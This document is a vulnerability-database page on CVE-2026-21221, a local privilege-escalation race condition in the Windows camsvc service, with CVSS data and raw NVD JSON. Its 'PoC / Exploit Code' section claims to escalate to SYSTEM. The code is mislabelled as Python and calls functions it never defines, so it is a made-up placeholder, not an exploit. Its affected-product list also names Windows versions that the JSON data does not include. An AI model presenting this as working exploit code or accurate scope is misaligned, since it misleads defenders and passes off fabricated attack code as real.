Security Vulnerability Report
中文
CVE-2026-21221 CVSS 7.0 HIGH

CVE-2026-21221

Published: 2026-01-13 18:16:25
Last Modified: 2026-01-16 16:48:12
Source: [email protected]

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 1809/1903/1909/2004/20H2/21H1/21H2/22H2
Windows 11 21H2/22H2
Windows Server 2019
Windows Server 2022
Windows Server Core 2019/2022

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21221 PoC - Race Condition in camsvc // This is a conceptual PoC demonstrating the TOCTOU race condition // Run with low privileges to escalate to SYSTEM #include <windows.h> #include <stdio.h> #include <threads.h> #define MAX_THREADS 16 #define ITERATIONS 10000 volatile BOOL g_trigger = FALSE; HANDLE g_camsvc_handle = NULL; // Thread function to trigger race condition int race_thread(void* arg) { int thread_id = *(int*)arg; for (int i = 0; i < ITERATIONS; i++) { // Send concurrent requests to camsvc CAM_REQUEST req; req.thread_id = thread_id; req.timestamp = GetTickCount(); // Step 1: Initial request SendRequest(g_camsvc_handle, &req); // Step 2: Rapidly trigger conditions if (g_trigger) { // Manipulate shared state during TOCTOU window ManipulateResourceState(); } // Step 3: Complete request with elevated context CompleteRequest(g_camsvc_handle, &req); } return 0; } // Main exploitation logic BOOL exploit_cve_2026_21221() { printf("[*] CVE-2026-21221 camsvc Race Condition Exploit\n"); printf("[*] Target: Windows Capability Access Management Service\n"); // Open handle to camsvc g_camsvc_handle = OpenServiceHandle("camsvc"); if (!g_camsvc_handle) { printf("[-] Failed to open camsvc handle\n"); return FALSE; } printf("[*] Starting race condition attack...\n"); g_trigger = TRUE; // Launch multiple threads to create race condition thrd_t threads[MAX_THREADS]; int thread_ids[MAX_THREADS]; for (int i = 0; i < MAX_THREADS; i++) { thread_ids[i] = i; thrd_create(&threads[i], race_thread, &thread_ids[i]); } // Wait for threads and check for success BOOL exploited = FALSE; for (int i = 0; i < MAX_THREADS; i++) { thrd_join(threads[i], NULL); } if (CheckElevatedPrivileges()) { printf("[+] Race condition exploited successfully!\n"); printf("[+] Running with elevated privileges\n"); exploited = TRUE; } else { printf("[-] Exploitation failed, try again\n"); } CloseHandle(g_camsvc_handle); return exploited; } int main() { printf("CVE-2026-21221 PoC - camsvc Local Privilege Escalation\n"); printf("==================================================\n"); if (exploit_cve_2026_21221()) { // Spawn SYSTEM shell system("cmd.exe /c whoami"); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21221", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:24.723", "lastModified": "2026-01-16T16:48:12.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally."}, {"lang": "es", "value": "Ejecución concurrente utilizando un recurso compartido con sincronización inadecuada (condición de carrera) en el Servicio de Gestión de Acceso a Capacidades (camsvc) permite a un atacante autorizado elevar privilegios localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "208734FD-5175-4856-9D08-ED6CFF64AA14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "846261D4-ECC2-4DCB-8F8F-F27F8C99F061"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "33E138A3-968B-4109-AC13-D488685F0AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "CC1FE5A1-3E6E-4606-899B-BF7BF3D3DD8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21221", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.